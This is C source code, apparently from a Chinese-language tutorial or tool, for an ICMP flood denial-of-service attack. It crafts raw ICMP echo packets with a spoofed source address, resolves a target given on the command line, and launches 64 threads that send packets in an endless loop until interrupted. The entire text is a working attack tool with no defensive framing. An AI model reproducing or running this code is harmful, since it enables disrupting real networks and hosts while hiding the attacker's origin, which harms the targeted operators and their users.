void DoS_icmp_pack(char* packet) { struct ip* ip_hdr = (struct ip*)packet; struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip)); ip_hdr->ip_v = 4; ip_hdr->ip_hl = 5; ip_hdr->ip_tos = 0; ip_hdr->ip_len = htons(ICMP_PACKET_SIZE); ip_hdr->ip_id = htons(getpid()); ip_hdr->ip_off = 0; ip_hdr->ip_ttl = 64; ip_hdr->ip_p = PROTO_ICMP; ip_hdr->ip_sum = 0; ip_hdr->ip_src.s_addr = inet_addr(FAKE_IP);; //假裝源地址 ip_hdr->ip_dst.s_addr = dest; //填入要攻擊的目的主機地址 icmp_hdr->icmp_type = ICMP_ECHO; icmp_hdr->icmp_code = 0; icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO << 8));//注意這裏,由於數據部分爲0,咱們就簡化了一下checksum的計算了 }
void Dos_Attack() { char* packet = (char*)malloc(ICMP_PACKET_SIZE); memset(packet, 0, ICMP_PACKET_SIZE); struct sockaddr_in to; DoS_icmp_pack(packet); to.sin_family = AF_INET; to.sin_addr.s_addr = dest; to.sin_port = htons(0); while(alive) //控制發包的全局變量 { sendto(rawsock, packet, ICMP_PACKET_SIZE, 0, (struct sockaddr*)&to, sizeof(struct sockaddr)); } free(packet); //記得要釋放內存 }
void Dos_Sig() { alive = 0; printf("stop DoS Attack!\n"); }
int main(int argc, char* argv[]) { struct hostent* host = NULL; struct protoent* protocol = NULL; int i; alive = 1; pthread_t attack_thread[THREAD_MAX_NUM]; //開64個線程同時發包 int err = 0; if(argc < 2) { printf("Invalid input!\n"); return -1; } signal(SIGINT, Dos_Sig); protocol = getprotobyname(PROTO_NAME); if(protocol == NULL) { printf("Fail to getprotobyname!\n"); return -1; } PROTO_ICMP = protocol->p_proto; dest = inet_addr(argv[1]); if(dest == INADDR_NONE) { host = gethostbyname(argv[1]); if(host == NULL) { printf("Invalid IP or Domain name!\n"); return -1; } memcpy((char*)&dest, host->h_addr, host->h_length); } rawsock = socket(AF_INET, SOCK_RAW, PROTO_ICMP); if(rawsock < 0) { printf("Fait to create socket!\n"); return -1; } setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1")); printf("ICMP FLOOD ATTACK START\n"); for(i=0;i<THREAD_MAX_NUM;i++) { err = pthread_create(&(attack_thread[i]), NULL, (void*)Dos_Attack, NULL); if(err) { printf("Fail to create thread, err %d, thread id : %d\n",err, attack_thread[i]); } } for(i=0;i<THREAD_MAX_NUM;i++) { pthread_join(attack_thread[i], NULL); //等待線程結束 } printf("ICMP ATTACK FINISHI!\n"); close(rawsock); return 0; }